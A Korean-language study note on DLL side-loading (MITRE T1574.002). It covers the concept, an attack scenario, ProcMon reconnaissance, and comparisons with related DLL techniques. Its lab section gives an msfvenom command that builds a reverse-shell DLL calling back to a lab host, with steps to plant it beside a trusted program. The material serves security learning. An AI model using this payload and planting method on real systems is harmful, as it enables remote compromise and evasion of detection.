ddl sideloading (Dynamic link library)

---

🧩 DLL 사이드 로딩 (DLL Side-Loading) 이란?

✅ 정의:

신뢰할 수 있는 실행 파일(EXE)이 악성 DLL을 로드하도록 유도하는 기법입니다.

쉽게 말해:

• 어떤 정식 프로그램(EXE)은 실행될 때 특정 DLL을 자동으로 로드합니다.
• 이때 해커가 만든 악성 DLL을 같은 폴더에 두면, 프로그램이 그걸 정상 DLL인 줄 알고 로딩함.

✅ DLL 사이드로딩은 합법적인 프로그램을 이용한 우회 수단입니다 → 탐지 회피(Defense Evasion) 목적도 큼.

---

🎯 공격 시나리오 예제

예: 신뢰된 EXE가 abc.dll을 로딩한다고 가정

공격 단계:

1. 마이크로소프트에서 배포한 정상 프로그램 program.exe 사용
2. program.exe가 실행 시 abc.dll을 로드하는 걸 확인 (ProcMon 등으로)
3. 공격자는 악성코드 넣은 abc.dll을 같은 폴더에 둠
4. program.exe 실행 시 악성 DLL도 함께 실행됨 😈

---

🧪 실습 예시

# 1. 악성 DLL 제작
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.XX LPORT=4444 -f dll -o abc.dll

# 2. 신뢰된 EXE와 같은 디렉토리에 복사
cp abc.dll /tmp/folder_with_trusted_program/
cp program.exe /tmp/folder_with_trusted_program/

# 3. 실행
cd /tmp/folder_with_trusted_program/
./program.exe

이러면 공격자의 리버스쉘로 연결됩니다.

---

🔍 어떻게 대상이 어떤 DLL을 로딩하는지 알 수 있을까?

➡️ ProcMon (Process Monitor) 툴 사용:

• program.exe 실행 후,
• 어떤 DLL을 어디에서 찾는지 로그 확인
• 없는 DLL을 찾으려 한다면 그 이름으로 만든 DLL을 심을 수 있음

---

🧠 관련 MITRE ATT\&CK 정보

항목	내용
ATT\&CK ID	T1574.002 – DLL Side-Loading
Tactic	Execution, Defense Evasion
Description	합법적인 애플리케이션을 통해 악성 DLL 실행

---

📁 사이드로딩과 비슷한 개념들

기법	설명
DLL Hijacking	DLL 경로 취약점 (예: Unquoted Path) 이용
DLL Injection	메모리 내 타 프로세스에 직접 DLL 삽입
DLL Side-Loading	합법적인 EXE가 악성 DLL을 실행하게 유도

---

🛡️ 방어 관점에서 보면?

• 코드 서명된 EXE라도, DLL 위치만 조작하면 악성코드 실행 가능
• 공격자가 바이러스를 만들지 않고도 악성 행위를 수행할 수 있어서 탐지 어려움

---

📚 마무리 요약

항목	설명
목적	탐지 우회 + 코드 실행
필요 조건	DLL 로딩 구조를 가진 신뢰된 EXE
툴	ProcMon, msfvenom, Cobalt Strike 등
실습 포인트	EXE가 찾는 DLL 이름 파악 → 같은 이름으로 악성 DLL 배치

---